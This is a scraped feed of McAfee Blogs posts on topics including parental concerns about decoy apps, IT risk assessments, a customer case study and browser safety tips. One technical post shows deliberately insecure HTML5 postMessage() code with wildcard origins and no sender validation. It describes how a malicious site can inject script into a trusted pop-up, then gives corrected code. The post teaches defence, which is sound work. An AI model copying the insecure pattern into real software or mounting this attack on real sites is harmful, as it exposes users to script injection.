  • Fake Pin: Creates a decoy Keepsafe with a separate PIN code

How to Discourage Decoy Apps

Connection first. Communication and a strong relationship with your child are the most cyber savvy tools you have to keep your child from making unwise choices online. So, take time each day to connect with your child. Understand what makes them tick, how they use technology, and what’s going on in their lives and hearts.

Monitoring. Weekly phone monitoring and using parental controls is always a good idea depending on the age of your child, your trust level, and the expectations that exist within your family. Know what apps your kids download.

Ask to Buy. Both Apple and Android have parental app purchase approval options on their websites you can set up to examine an app before it’s downloaded.Decoy Apps

Get real. Talk candidly about the risks of sending, sharing, and even archiving risky photos on digital devices. Under the law, child pornography is considered to be any nude photograph or video of someone under the age of 18. It usually does not matter if the person possessing or distributing it is under the age of 18. Any offender can face fines and time behind bars. New laws that address juveniles caught possessing or distributing explicit photos are emerging every day and vary state by state.

Reality check. Nothing is private. Kids can share content directly from a decoy app, which means that their passcode is useless. Shared content is out of your hands forever. Sharing risky photos is never, ever a good idea.

It’s worth stressing to your kids that it’s not just about the technology you use, but how you use it that can create issues. None of the decoy apps we mentioned in this post are inherently “dangerous” apps, it’s the way the apps are used that make them unsafe for kids. The same mantra applies to social networks. And remember — give yourself grace as a parent. You can’t police your child’s online activity 24/7. It’s impossible. What you can do is educate yourself and know what these mobile apps do so you can address precarious situations that may come up.
ToniTwitterHS

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

The post Why Kids Use Secret Decoy Apps and Why Parents Should Care appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/kids-use-secret-decoy-apps-parents-care/feed/ 0
Risk assessments for local governments and SMBs https://securingtomorrow.mcafee.com/business/optimize-operations/risk-assessments-for-local-governments-and-smbs/ Fri, 26 May 2017 18:55:15 +0000 https://securingtomorrow.mcafee.com/?p=74564 Next week, I am scheduled for a semi-annual risk assessment with my dentist. He performs a very specific, highly focused type of risk assessment that is totally worth the $125 it will cost. In addition to performing specialized maintenance (hypersonic cleaning), he will provide a threat assessment (for oral cancer, cavities, periodontal disease and other …

The post Risk assessments for local governments and SMBs appeared first on McAfee Blogs.

]]>
Next week, I am scheduled for a semi-annual risk assessment with my dentist. He performs a very specific, highly focused type of risk assessment that is totally worth the $125 it will cost. In addition to performing specialized maintenance (hypersonic cleaning), he will provide a threat assessment (for oral cancer, cavities, periodontal disease and other anomalies). I’ll leave his office confident that my mouth is in a low-risk situation for the next six months as long as I continue to follow best practices and perform daily maintenance procedures. I am only vulnerable to these threats if I fail to follow a daily program of brushing and flossing.

I could always choose to save the small fee for these risk assessments and wait for a major dental disaster to occur. The problem with this approach is that a single incident may cost thousands of dollars if I need a root canal or some other type of procedure. Ten years of checkups are less costly than even a single disaster.

Enterprise IT risk assessments

Unfortunately, in the world of local government and SMBs, the most common approach to risk management is to allow a major catastrophe to occur before realizing the value of an enterprise risk management program.

I am at a loss to explain it. Incidents or problems involving your information and IT infrastructure are far more costly than risk management programs. Data loss, breaches, major downtime, malware, lawsuits and fines for compliance violations may cost hundreds of thousands or millions of dollars. They can permanently shut down your small business or really irritate your board of directors in a corporate environment. In the public sector, constituents pay for major screw-ups through increased taxes while the events are often covered up and the culprits skirt the blame and keep their jobs.

When was your organization’s last risk assessment? Can you put your hands on the report? If you haven’t had a risk assessment recently, it’s a safe bet that your policies are sorely lacking. Defining an organizational policy for risk assessment is an essential component of any comprehensive suite of security policies. Both HIPAA and GLBA require periodic risk assessments, but it is a sound practice for all types and sizes of organizations.

Where to start?

If you haven’t previously conducted an enterprise IT risk assessment you should carefully consider your starting point. For example, if you have few or no security policies, it may be wise to form an IG (information governance) committee and begin by developing of a comprehensive set of policies, procedures, standards and guidelines. On the other hand, your management team may benefit from the kind of wake-up call that a devastatingly thorough risk assessment can produce. A 100-page report that says you suck at security and risk management on every page may be just what you need to get everyone’s attention.

The results of a risk assessment should be used to reduce your organization’s risk exposure, improve CIA (confidentiality, integrity and availability), initiate positive change, and begin building a security culture. While using risk assessments as a punitive device isn’t the best approach, such reports often expose malfeasance and incompetence of proportions so vast that appropriate consequences are in order. In other words, if you have been paying a CIO $200,000 and the assessment uncovers gaping policy, security and privacy holes, you should certainly replace the CIO with one who has the required skill set.

Scope the project carefully

Risk assessments come in a lot of flavors and the specific purpose and scope must be worked out with the auditors in advance. A few years ago, a client of mine released an RFP for a risk assessment after we worked extensively on the development of their information security policies. The proposals ranged from $15,000 to well over $150,000. This can happen even with a pretty clear scope. Big 4 firms, for instance, have hourly rates that may be several times what a local, independent practitioners may charge. NIST SP 800 – 30 provides valuable information on how to perform risk assessments, including some information on scoping.

Risk assessments may be qualitative or quantitative. You may be able to do some of the quantitative work in-house by gathering cost data for all your assets in advance of the assessment. Regardless of the scope and approach, the auditors will ask to see lots of documentation.

Positive outcomes

One positive outcome of a risk assessment is that it may force your management team to rethink EVERYTHING – in-house application development, infrastructure support, IT staffing & responsibilities, LOB (line of business) staffing & responsibilities, budgets, and just about everything else related to the manner in which your organization is run.

Risk assessments are way cheaper than disasters, so go schedule your checkup.

 

This article was written by Jeffrey Morgan from CIO and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Risk assessments for local governments and SMBs appeared first on McAfee Blogs.

]]>
What security leaders need before applying intelligence to cyber https://securingtomorrow.mcafee.com/business/optimize-operations/what-security-leaders-need-before-applying-intelligence-to-cyber/ Thu, 25 May 2017 20:04:26 +0000 https://securingtomorrow.mcafee.com/?p=74551 What does it take to successfully apply the process of intelligence to the field of cyber security? Or perhaps we need to consider what happens when our efforts don’t produce the outcomes we seek. What really needs to happen? John Boling has some ideas. John recently shared his insights in Do we really need higher …

The post What security leaders need before applying intelligence to cyber appeared first on McAfee Blogs.

]]>
What does it take to successfully apply the process of intelligence to the field of cyber security?

Or perhaps we need to consider what happens when our efforts don’t produce the outcomes we seek. What really needs to happen?

John Boling has some ideas. John recently shared his insights in Do we really need higher education to solve our perceived and actual security needs? Since that piece got people talking, I reached out to see if he wanted to step up and try out my new Security Slapshot series … and he stepped up to take a shot.

John Boling (@CySocSci) is a security veteran who followed his own path to success. Currently working as a Senior Security Consultant, he started on the front lines supporting MS-DOS and Windows before completing degrees from the University of North Carolina at Charlotte and the National Intelligence University. A conforming contradiction, he boldly blends business, technology, and social science to understand security threats.

Here’s his Security Slapshot on applying intelligence to security:

SLAPSHOT: Intelligence is NOT failing because of data or people, but from a lack of direction.

How do you get to a destination without knowing where you are going?

You can have the best maps and algorithms, but without knowing the desired destination how does a path emerge? As a result, many programs meander. Sometimes, an adequate destination appears, however many times it does not.

The reference model for the intelligence process is found in the US Department of Defense publication Joint Intelligence (JP 2-0). Much like the OSI Reference Model for networking, this represents the core understanding an intelligence professional should hold. While variances occur, all start with some sort of requirement, followed by collecting and processing data such that it can be analyzed, and finish with a reporting mechanism. Each component of this process serves a purpose and needs feedback for refinement.

As a system, the intelligence process often fails from lack of direction.

The solution is discipline to the process. The industry must recognize that intelligence emerges from a system with clear objectives. No mystery exists on processes that develop quality intelligence products, but expectations should be measured. Give your analyst clear direction outlining what questions need answers for the organization. Build data collection and processing engines to support their analysis based on those requirements. I would incorporate the following in any intelligence program:

My Take (some color commentary)

I frequently point out the three keys of leadership including articulating the current situation accurately, painting a picture of a better tomorrow to set the direction, and then offering individuals a pathway that elevates and accelerates them.

Seems the proper application of intelligence principles requires a similar focus. In the process, the organization benefits as individuals thrive. The challenge lies in embracing the situation and translating the value of the intelligence process into the picture of a better tomorrow.

 

This article was written by Michael Santarcangelo from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post What security leaders need before applying intelligence to cyber appeared first on McAfee Blogs.

]]>
With McAfee ENS, Swedish Town Gains More Secure Environment Requiring Less Work https://securingtomorrow.mcafee.com/business/mcafee-ens-swedish-town-gains-secure-environment-requiring-less-work/ https://securingtomorrow.mcafee.com/business/mcafee-ens-swedish-town-gains-secure-environment-requiring-less-work/#respond Thu, 25 May 2017 14:00:06 +0000 https://securingtomorrow.mcafee.com/?p=74118 For Jens Lindström, who oversees security operations for Norrköpings Kommun, a Swedish town of 140,000 inhabitants, ransomware was becoming his nemesis. “With the increasing pace of ransomware attacks, I was beginning to imagine a day in the not-too-far-off future when all my time would be dedicated to dealing with ransomware attacks,” he muses. “Thankfully, we …

The post With McAfee ENS, Swedish Town Gains More Secure Environment Requiring Less Work appeared first on McAfee Blogs.

]]>
For Jens Lindström, who oversees security operations for Norrköpings Kommun, a Swedish town of 140,000 inhabitants, ransomware was becoming his nemesis. “With the increasing pace of ransomware attacks, I was beginning to imagine a day in the not-too-far-off future when all my time would be dedicated to dealing with ransomware attacks,” he muses. “Thankfully, we implemented McAfee ENS before that could happen.”

The need to bolster endpoint protection and thwart ransomware ultimately drove this Swedish municipality to migrate the McAfee VirusScan Enterprise engine, McAfee Host Intrusion Prevention, and McAfee SiteAdvisor® functionality of its McAfee Complete Threat Protection suite to McAfee Endpoint Security (ENS) version 10.2 not long after it became available. And soon after deploying McAfee ENS version 10.2, ENS version 10.5 became available so the organization upgraded to it to take advantage of its Real Protect machine learning technology in addition to Dynamic Application Containment technology.

According to Lindström, migration of the town’s 14,000 endpoints to McAfee ENS 10.2 took only a few hours each day for about a week. “With the help of our partner Advania and the McAfee migration tool, [migration to McAfee ENS] was extremely straightforward and not complicated at all,” says Lindstrom. “First, we rolled it out to all our schools, then we moved on to the administrative networks.”

Happily, Lindström’s hopes for improved endpoint protection with McAfee ENS were fulfilled. “Our single biggest driver for migrating to McAfee ENS and our biggest benefit thus far has been better protection,” notes Lindström. “Since implementing ENS, we have seen a dramatic reduction in infected systems and ransomware attacks.”

Improved protection means Lindström spends less time fighting fires, which enables him to do his job more efficiently and effectively. In addition, the improved graphical user interface in McAfee ENS helps him every day in the security administrator part of his job. “Dealing with endpoint security has become much easier and more streamlined since we migrated,” he says. “I can quickly see what tasks require action and more easily do many of those tasks, such as push updates across the enterprise.”

Of course, making security administration easier is not the Municipality’s top priority; protecting services and information for the town’s citizens is. However, with McAfee ENS, Norrköpings Kommun has a more secure environment while requiring less time and effort of its very limited information security staff.

To read the full case study on Norrköpings Kommun and its McAfee ENS implementation, click here. Get your questions answered by tweeting @McAfee_Business.

The post With McAfee ENS, Swedish Town Gains More Secure Environment Requiring Less Work appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-ens-swedish-town-gains-secure-environment-requiring-less-work/feed/ 0
Security Risks Arise From Insecure Implementations of HTML5 postMessage() API https://securingtomorrow.mcafee.com/technical-how-to/security-risks-arise-insecure-implementations-html5-postmessageapi/ https://securingtomorrow.mcafee.com/technical-how-to/security-risks-arise-insecure-implementations-html5-postmessageapi/#respond Thu, 25 May 2017 03:15:40 +0000 https://securingtomorrow.mcafee.com/?p=74367 In this post we are going to have a look at the security risks arising due to insecure implementation of the HTML5 postMessage()API. Before we discuss how this cross-domain messaging API works, we must understand a few important concepts such as the same-origin policy and security risks associated with cross-origin communications. Same-origin policy The origin …

The post Security Risks Arise From Insecure Implementations of HTML5 postMessage() API appeared first on McAfee Blogs.

]]>
In this post we are going to have a look at the security risks arising due to insecure implementation of the HTML5 postMessage()API. Before we discuss how this cross-domain messaging API works, we must understand a few important concepts such as the same-origin policy and security risks associated with cross-origin communications.

Same-origin policy

The origin of a page is decided by three unique factors: hostname, protocol, and port number. For example, http://test.com and https://test.com have different origins because the protocol is different. Similarly, http://one.test.com and http://two.test.com have different origins because the hostnames are different. The origin property is also different for two services running on the same host with different port numbers, for example, http://test.com:8081 and http://test.com:8082 are different origins.

The same-origin policy (SOP) is a browser-level security control that dictates how a document or script belonging to one origin can interact with a resource from some other origin. Basically, SOP prevents scripts running under one origin from reading data from another origin. Cross-domain requests and form submissions are still permitted, but reading data from another origin is not permitted. SOP does not prevent resources hosted on different domains from being embedded in a page by using <script> tags, cascading style sheets, and <img> tags.

In a world without SOP, the Internet would not be very safe. Imagine you are logged into your bank’s website and simultaneously are accessing a news site in another tab. If the news site can read data from your bank’s site, you do not have to be a security expert to understand the risk.

Need for cross-origin communication

SOP has done a good job protecting users from unauthorized cross-domain data access, though like many other security controls it does not boost usability. The Internet has evolved beyond individual websites serving content and has become more distributed. The need arose to enable secure cross-domain communication to allow services hosted on different domains to communicate with each other. The postMessage() API, introduced in HTML5, tries to provide a safe mechanism. (There are other methods for cross-domain communication such as using HTTP response headers, but we will not discuss those here.)

Cross-origin messaging

The Window.postMessage() method, introduced in HTML5, allows JavaScript code running on different origins to communicate with each other in a bidirectional manner. This API can be used for communication between an iframe and its parent document. Similarly, it can be used by an HTML page and a child window to exchange messages, such as an embedded third-party video notifying its parent frame when the user pauses the video. Let’s look at some code snippets to better understand how cross-origin messaging works.

Consider an HTML page hosted on http://www.test.com that contains an iframe element pointing to http://www.child-frame.com. The parent frame can use the postMessage() call on the window object of the iframe to send a message.

//The following JavaScript code will be part of the parent document
//iframe example
var iframe = document.getElementsByTagName(‘iframe’)[0];
iframe.contentWindow.postMessage(“hello”, “*”);
——————————–OR—————————————–
// pop-up window example
var ref = window.open(“http://childframe.com”);
ref.postMessage(“hello”, “*”); 

In the preceding code snippet the iframe element is fetched and in the next step the contentWindow property of the iframe is accessed, which returns a window object reference. The postMessage() call contains two parameters, the message string and the target domain.

In the pop-up window example, in which messages are to be exchanged between the parent document and a child pop-up window, the reference returned by window.open() can be used to call the postMessage() API.

//The following JavaScript code will be a part of the child frame
window.addEventListener(‘message’, msgHandler);
function msgHandler(event)

{
// The sender’s origin and data received are displayed
alert(event.origin+‘says:’+ event.data);
}

On the receiving end, we need to have an event listener to listen for an incoming message. The preceding msgHandler() method is triggered when an event is received. The dispatched message contains certain properties that can be accessed by using the event object reference:

  • event.data: Object sent from the sender window (arrays, strings, numbers and other JavaScript objects are supported)
  • event.origin: Origin of the sender window
  • event.source: A reference to the window object of the sender window. This can be used to send a message to the sender window.

Risk analysis and protection measures

Let’s look at a couple of elements from a developer’s perspective:

  • It is important to specify the origin of the target window while sending a cross-origin message to ensure that the message is received by the intended recipient.
  • On the receiving end, it is important to validate the origin of the sender to check the integrity of the message received.
  • Using the received data in the client-side logic without validation may open doors for script-injection attacks.

The API specification provides very clear guidelines to developers for securely using the postMessage()API. (See this link to the specification.) The code snippets shown earlier do not follow these best practices while implementing the postMessage() API. Let’s look at the compliant code snippets.

//The following JavaScript code will be part of the parent document
var iframe = document.getElementsByTagName(‘iframe’)[0];
//The postMessage call specifies the target origin rather than using wildcards
iframe.contentWindow.postMessage(“hello”, “http://www.child-frame.com”); 

The preceding code explicitly mentions the target origin. The previous example used a wild card, which offers no guarantee that the message will be delivered to the intended origin. This omission may result in a vulnerability when an iframe or a pop-up tries to communicate with its parent because a malicious site could open a legitimate website in a pop-up or iframe.

Similarly, on the receiving end, the authors should check if the message is received from an expected origin. Along with origin verification, it is important to perform input validation on the data received from the other domain before using it in the client-side logic. The compliant code solution for the receiving end follows:

//The following JavaScript code will be a part of the child frame
window.addEventListener(‘message’, msgHandler);
function msgHandler(event)

{
// The sender’s origin is validated
if (event.origin == “http://www.test.com”)

{
if(event.data == “hello”)

{
//Do some action after validating the message content
}

}

}

Demonstration of an attack

Consider the (fictional) credit card rewards program website https://www.acmerewards.com, which is running a promotional campaign. Customers are asked to play a quick game of Sudoku with the week’s highest scorers receiving reward points. The game is hosted on https://play.acmerewards.com. This URL opens as a pop-up from the main site’s home page.

The link to this game is shown to customers after they are authenticated. Once the pop-up opens, the main site passes the name of the current user to the pop-up window. The game window uses this to create a welcome message.

The vulnerability arises because the pop-up window assumes that it will always receive the message from www.acmerewards.com and thus does not validate the sender’s origin and the contents of the message. Because it is possible to open the pop-up window from any HTML page, the post message can be sent by any malicious domain. The message can contain malicious JavaScript code, which could run in the context of http://play.acmerewards.com, resulting in script injection that can be exploited in many ways. We will use a locally deployed application to demonstrate this attack. The initial screenshots show the expected application behavior. The final screen shows the script-injection attack using a post message.

The home page (www.acmerewards.com) of the rewards application. Clicking the PLAY button opens a pop-up window.

The pop-up window opens (play.acmerewards.com). Clicking OK in the sender window (www.acmerewards.com) sends the post message to the pop-up window. The two windows have different origins.

The string “username” is sent as a message from the sender window and is used to create a welcome message by the pop-up window.

We see the final exploit scenario in which a malicious website (www.realbadhacker.com) opens a pop-up window that points to a legitimate URL and passes a cross-site scripting payload instead of the username in the message. This script runs in the context of the target domain, which is trusted by the user.

The attack takes place completely on the client side; there is no interaction with the server. This “client XSS” attack avoids any server-side control that might have helped detect or prevent the attack. Both the source and sink of this attack occur on the client, and the injected malicious scripts are never sent to the server. The vulnerability should be fixed in the client-side code by validating the sender’s origin and data received.

The code for this demo application can be found here. Code samples provided in this post have been tested with Mozilla Firefox Version 52.0.1.

Reference

https://html.spec.whatwg.org/multipage/comms.html#web-messaging

The post Security Risks Arise From Insecure Implementations of HTML5 postMessage() API appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/technical-how-to/security-risks-arise-insecure-implementations-html5-postmessageapi/feed/ 0
The modern guide to staying safe online https://securingtomorrow.mcafee.com/business/neutralize-threats/the-modern-guide-to-staying-safe-online/ Wed, 24 May 2017 22:15:17 +0000 https://securingtomorrow.mcafee.com/?p=74510 The internet can be a scary place. Threats come in many forms, lurking in practically any corner. Worse, yesterday’s prevailing advice for staying safe online – avoid dodgy websites, don’t traffic in stolen or illegal goods, interact only with people you know – no longer holds. Phishing emails from supposed family members, spyware piggybacking on …

The post The modern guide to staying safe online appeared first on McAfee Blogs.

]]>
The internet can be a scary place. Threats come in many forms, lurking in practically any corner. Worse, yesterday’s prevailing advice for staying safe online – avoid dodgy websites, don’t traffic in stolen or illegal goods, interact only with people you know – no longer holds. Phishing emails from supposed family members, spyware piggybacking on legitimate apps, well-known sites hijacked with malicious code – digital safety clearly needs new rules to meet today’s evolving threatscape.

Considering how much of our digital lives occurs online – communications, financial transactions, entertainment, work, education, to name a few – adopting even a few safe browsing practices can lead to broad benefits. And this includes how we deal with email messages as well, given how popular email is as a delivery mechanism for online attacks using exploit kits and malware.

Here, we provide a strategic guide for staying safe online, outlining what you can do to protect your data and privacy on the web, while remaining productive.

Understand your threat profile

With so many threats looming, it’s tempting to take the strictest approach by locking everything down, but the challenge is to balance precautions in a way that keeps you productive. For example, to avoid malicious JavaScript, you could just turn off JavaScript in your browser preferences – except half the Internet would become nearly impossible to use. Have you tried using Gmail without JavaScript turned on? It isn’t pleasant.

We all use the web differently, and our risks vary drastically, depending on where we are, what we are doing, even what day it is. How security researchers stay safe online is dramatically different from a consumer who emails, uses Facebook, and watches Netflix. That in turn is different from a developer downloading new tools and frequenting forums for advice.

At a base level, you should regularly update all your applications – not just the OS, but every application, especially your web browser. You should also switch your browser preferences to click-to-play for Flash if your browser hasn’t proactively done that for you. You should also deactivate ActiveX and uninstall the Java client on your machine. Unless you are using Java-hungry client applications, such as games or certain educational offerings, you likely don’t need Java anymore. Even major videoconferencing applications are shifting to pure HTML5.

You should also consider the combination of venue and activity. For example, performing sensitive transactions on public wireless networks can get you in trouble. The public Wi-Fi at your favorite coffee shop is not the place for online banking. Not even if you’re using an SSL connection; a man-in-the-middle attack is still possible over SSL.

Once you’ve got those basics down, you’ll need to consider what dangers you are most worried about, what assets you want to protect, who you interact with regularly, and where your data is stored. In the following sections, we break down these concerns to help you match your secure browsing practices to your threat tolerance – the level of threat you’re willing to live with online.

Threat level 1: No malware, please

Most folks, especially businesses, want to avoid malware at all costs. Two of the most common vectors are links that download malware and drive-by-downloads, in which malware is downloaded automatically just by loading a web page. Dangerous links can be found on webpages, in email, or on IM. Scammers often use social networks and URL shorteners to spread malicious links in disguise, in hopes that someone will click.

First action: Stop clicking on links. This requires social training, and it can be hard to stick to, especially given all the links we are sent all the time both professionally and personally. Ask people you communicate with regularly to send you a heads-up notification if they are planning to send a link – and to send the link only after getting positive confirmation. Or, ask people to confirm that they in fact sent the link by using a different channel. For example, text your brother to ask if the link sent from his account is really from him. This may sound paranoid, but the recent fake Google Docs scam succeeded because people thought the malicious file was from someone they trusted. Always type in your own links, and if someone sends you a link to what looks like a cool whitepaper, go to the source directly and seek out the whitepaper on the website yourself.

Pro tip: Set your browser to ask where a document should be saved so that you are always aware when something is being downloaded. Drive-by-downloads rely on stealth so that users don’t even realize what is happening. Configure your security software to scan all files as they are downloaded.

Threat level 2: I don’t like spyware, either

An attacker who manages to compromise your browser can uncover all kinds of information. Here, browser add-ons are not necessarily your friend. Use them sparingly, as they can become an unforeseen delivery mechanism for malware. Periodically check your list of extensions (chrome://extensions in Chrome, about:addons in Firefox) to see whether anything unfamiliar or inexplicable is there. You can rarely go wrong by disabling something that looks suspicious. Also be mindful of web pages that try to trick you into installing browser extensions – for example, “Click ‘add’ to speed up this website” or some other deceptive prompt.

First action: Be extra cautious with browser add-ons created by individuals, as they may access sites without HTTPS. Even the pros struggle: LastPass, creator of the widely used password manager, has had to fix a number of serious vulnerabilities in its browser extension recently. Ask yourself if the convenience provided by an add-on outweighs the potential risk, especially if it’s something you may not find worthwhile in a month.

Pro tip: Always consider the source. If you need to download Flash or Adobe Reader, get it from Adobe’s website. Don’t download tools like these from unaffiliated websites, because it’s easy for spyware, adware, and other malicious files to piggyback onto the download. Don’t search for “free PDF converter” and download whatever comes up first. (Do you even need one? Chrome automatically turns pages into PDF, and Office has good PDF support nowadays.) Projects like PortableApps.com and Ninite provide convenient ways to automatically obtain and update common open source and free-to-use applications from trusted sources.

Threat level 3: No tracking at any time

It’s happened to all of us: After browsing for floor tiles on HomeDepot.com, ads for home improvement pop up everywhere on the internet. Advertisers rely on cookies to follow you online and serve up ads based on your activity. But it’s not just advertising. Websites use cookies to remember your accounts, passwords, and browsing history, and to track your activity on their site. When you disable and clear cookies you cut down on the personal data cybercriminals can obtain.

First action: Use private browsing or incognito mode when online. Here, cookies and browsing history aren’t retained when your session ends. You can fire up incognito mode and paste in a URL (that you are sure isn’t going to give malware) and navigate to the page fully sure you aren’t tracked. If you want to always be incognito on Chrome, add – incognito at the end of the target command in Chrome properties, and you’ll be in incognito mode whenever you launch Chrome. You can do the same for Firefox via about:config.

Pro tip: If you want to use Facebook, Twitter, or other social account but don’t want that login following you persistently, create a separate user profile in Chrome, Firefox, or Safari, one reserved exclusively for that social network. Log into it there, and only there, and use it there and only there. This confines the amount of data associated with that login to only those things you absolutely need it for. This technique is also useful for minimizing tracking from sites that use social networks as single-sign-on providers, like Spotify.

If you are concerned about tracking, you should enable Do Not Track on every browser you use. DNT isn’t enforced – it just tells websites that you’ve asked not to be tracked. It’s up to the websites you visit to respect that request. Many websites aren’t scrupulous and there is no guarantee the site you are visiting will honor the request, but it doesn’t hurt to at least make your preferences clear upfront.

Threat level 4: Hands off my information

Cookies are prime targets for cybercriminals because of the information they contain, especially those with emails, account names, and passwords. Even when obscured, this information can be used nefariously. Cross-site scripting attacks use JavaScript on a webpage to extract user details and session information from cookies and impersonate them online, and cross-site request forgery attacks use session cookies to forge requests for other sites.

First action: Block cookies whenever you can. While it would be nice to block both first-party and third-party cookies, and to disable session cookies, it makes basic web browsing such as email and social networking nearly impossible. You should at least block third-party cookies, and you should consider deleting your browser history on a regular basis.

Also, don’t let browsers store passwords. It’s convenient, but it’s hard to guarantee the security of the stored passwords. Use a separate password manager such as 1Password or KeePass.

Pro tip: For searches, use a secure search engine such as DuckDuckGo, which doesn’t store information automatically transmitted by the computer, such as your IP address and other pieces of digital identity. DuckDuckGo cannot auto-complete search queries based on previous searches or location, but that’s a small price to pay given that it also cannot link search history to you.

If you want to keep your information to yourself, private browsing is your friend. If no cookies are saved, there’s nothing to steal. It’s a good idea to delete all cookies after every browser session. You will have to log in to websites with each new session because they won’t know who you are. This is another use case for establishing distinct user sessions, in which you create sessions for specific logins and confine cookies for that login to that user session only.

While some add-ons can be dangerous, others are good – for example, Disconnect, which blocks third-party tracking cookies. The extension blocks social media accounts from tracking browsing history and gives users the ability to control the scripts on the site. Another extension worth having, Ghostery, blocks common tracking scripts but lets you whitelist sites that depend on them if need be.

Threat level 5: Don’t phish me

Phishing sites are fraudulent websites designed to steal personal information. This isn’t limited to login credentials for email or banking sites. Phishing sites can masquerade as contests and ask for your SSN. Phishing attacks can also redirect victims to a bogus site where malicious code is downloaded and the malware collects sensitive information. We see potential phishing attacks everywhere, so our natural inclination is to not click on any links.

First action: Don’t click on links received in email or open attachments, let alone fill out sensitive information in forms that come your way. That FedEx claim form may just be a fake. Pick up the phone and call FedEx to verify what is going on. Don’t click the link in an email that looks like it’s from HR warning you about your vacation balance. Go to the HR website directly to see what is wrong. Typing out URLs helps catch tricks such as using a 0 (zero) instead of an O (the letter) or nn instead of m, or the fact that the address is something like paypal.com.someothersite.com. Type a trusted URL for a company’s site into the address bar of your browser to bypass links in an email or instant message.

Pro tip: Provide personal information only on sites that use HTTPS. Remember that with Let’s Encrypt and other sources of free SSL certificates, just a padlock icon is no longer enough. Look for an EV cert – the name of the entity should show up in the browser bar. The HTTPS Everywhere extension from the Electronic Frontier Foundation is also a good option as it forces sites to put traffic over HTTPS.

If you receive emails from merchants – for instance, for specials or discounts – see if there’s an option to send emails as text instead of HTML. This makes it easier to see what the content of a given link is.

It’s difficult to detect all phishing attempts – some are extremely good. Make sure you don’t use the same password for your accounts so that a stolen one doesn’t mean all others are compromised. Use a password manager to generate discrete passwords for each site account. Try to keep personal Internet separate from work Internet, and never register for sites using your work address. If that account gets compromised, you don’t want it to lead to phishing attacks against your work address. Turn on two-factor authentication, when a site supports it, to make it harder for attackers to use stolen credentials – especially if that site is a financial institution.

Threat level 6: Nuclear protection

If you’re going for maximum protection, you’ll need to set up a system of multiple browsers and operating systems to keep activities separate. And you might want to consider a series of virtual machines to isolate the threats.

First action: Use different web browsers for different activities: Have a browser for financial transactions, another for communications, another for just browsing. That way, if an attacker compromises a web forum you frequent, he or she can’t use cross-site scripting to get access to online banking because the attack can’t jump across browsers. A Facebook scam can’t escape to gain access to Amazon.

For a very sensitive website – the crown jewel of your accounts – have a dedicated web browser for that site and be restrictive in its configurations. For example, having a dedicated browser used only to access your Amazon Web Services control panel means there is no way to “accidentally” browse to some other site (whitelist only AWS, block others) and potentially expose your organization’s entire cloud infrastructure. Turn on all security options to lock down the browser.

Pro Tip: For extremely risky – potentially dangerous – or incredibly sensitive sites, consider splitting up the activity across multiple virtual machines. Do all your banking in a dedicated virtual machine using a locked-down (yet up-to-date) browser. This eliminates all banking-focused web attacks, and the attacker would have to do a lot more work to get your banking information.

Linux Live CDs are great alternative to running VMs – you can even run a Live CD in a VM for maximum security. Tails is a very stripped-down Linux variant that runs off a USB drive and can be used to hide digital footprints, since it keeps nothing persistent.

Got an email attachment that looks hinky? Open it in a VM. If it’s malware, it has infected just an empty VM. Of course, don’t assume that everything is okay just because nothing happens in the VM: Malware can be designed to not execute within a VM. Keep that file always in the VM and away from your main desktop.

If you want to hide your activities online, consider Tor, which conceals your identity by using encryption to scramble data transmissions and routes traffic between multiple Tor nodes to obscure the origin. Since your traffic passes through random servers with Tor, the data is no longer tied to your personal IP address.

Use NoScript to disable Java, JavaScript, Flash, and other dynamic content. This option will break a lot of websites, but it lets you authorize content manually, so it requires careful attention to ensure malicious code doesn’t get approved by accident. Adblock Plus blocks pop-ups and other content from known advertising and spyware sites. There are concerns with how Adblock Plus creates blocklists, because advertisers can pay to be whitelisted on the platform, but it gets the job done if the goal is to shut down pop-up ads and block potential attacks.

An alternative is to disable JavaScript and block pop-ups from the browser itself. Most browsers automatically block pop-ups by default, but JavaScript is enabled by default, again because it’s so widely used.

Keep safe

Being safe online is a combination of technology, awareness, and willingness to jump through hoops. Today’s browsers offer lots of protections, including the ability to disable plugins and turn on anti-phishing mechanisms. Just turning those on and completing basic security hygiene, such as updating all software, will address much of the low-hanging fruit.

But it is easier than ever to be infected with malware or get hit by a phishing attack. Sometimes it’s just a matter of being in the wrong place at the wrong time. But once you know what you are most worried about and what your appetite for risk is, you can set a sensible security regimen to fit your needs, keeping you safe and productive online.

 

This article was written by Fahmida Y. Rashid, Serdar Yegulalp from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post The modern guide to staying safe online appeared first on McAfee Blogs.

]]>
For Three Years Running, McAfee Advanced Threat Defense Places in Radicati’s Top Players Quadrant for APT Protection https://securingtomorrow.mcafee.com/business/optimize-operations/three-years-running-mcafee-advanced-threat-defense-places-radicatis-top-players-quadrant-apt-protection/ https://securingtomorrow.mcafee.com/business/optimize-operations/three-years-running-mcafee-advanced-threat-defense-places-radicatis-top-players-quadrant-apt-protection/#respond Wed, 24 May 2017 17:28:00 +0000 https://securingtomorrow.mcafee.com/?p=74436 In this year’s Radicati APT Protection—Market Quadrant, McAfee Advanced Threat Defense attained a position in the Top Players quadrant for the third year running. The Radicati report assesses advanced persistent threat (APT) solutions from major security vendors and places them in its quadrant based on the depth and breadth of product functionality and strategic vision. …

The post For Three Years Running, McAfee Advanced Threat Defense Places in Radicati’s Top Players Quadrant for APT Protection appeared first on McAfee Blogs.

]]>
In this year’s Radicati APT Protection—Market Quadrant, McAfee Advanced Threat Defense attained a position in the Top Players quadrant for the third year running.

The Radicati report assesses advanced persistent threat (APT) solutions from major security vendors and places them in its quadrant based on the depth and breadth of product functionality and strategic vision. Top Players are typically market leaders that shape the industry through their technology innovations and understanding of market forces.

In the APT area, vendors are evaluated on multiple parameters. Some of these are: deployment options, malware detection methods, firewall and URL filtering for attack behavior analysis, web and email security, analysis of zero-day and advanced threats, sandboxing and quarantining, data loss prevention, administration, real-time updates, remediation, environment threat analysis, and more.

McAfee Advanced Threat Defense landed its position in the Radicati quadrant because of its ability to detect complex, sophisticated threats and to connect with other security components and turn threat information into action and protection.

Here are the key areas of strength emphasized by Radicati:

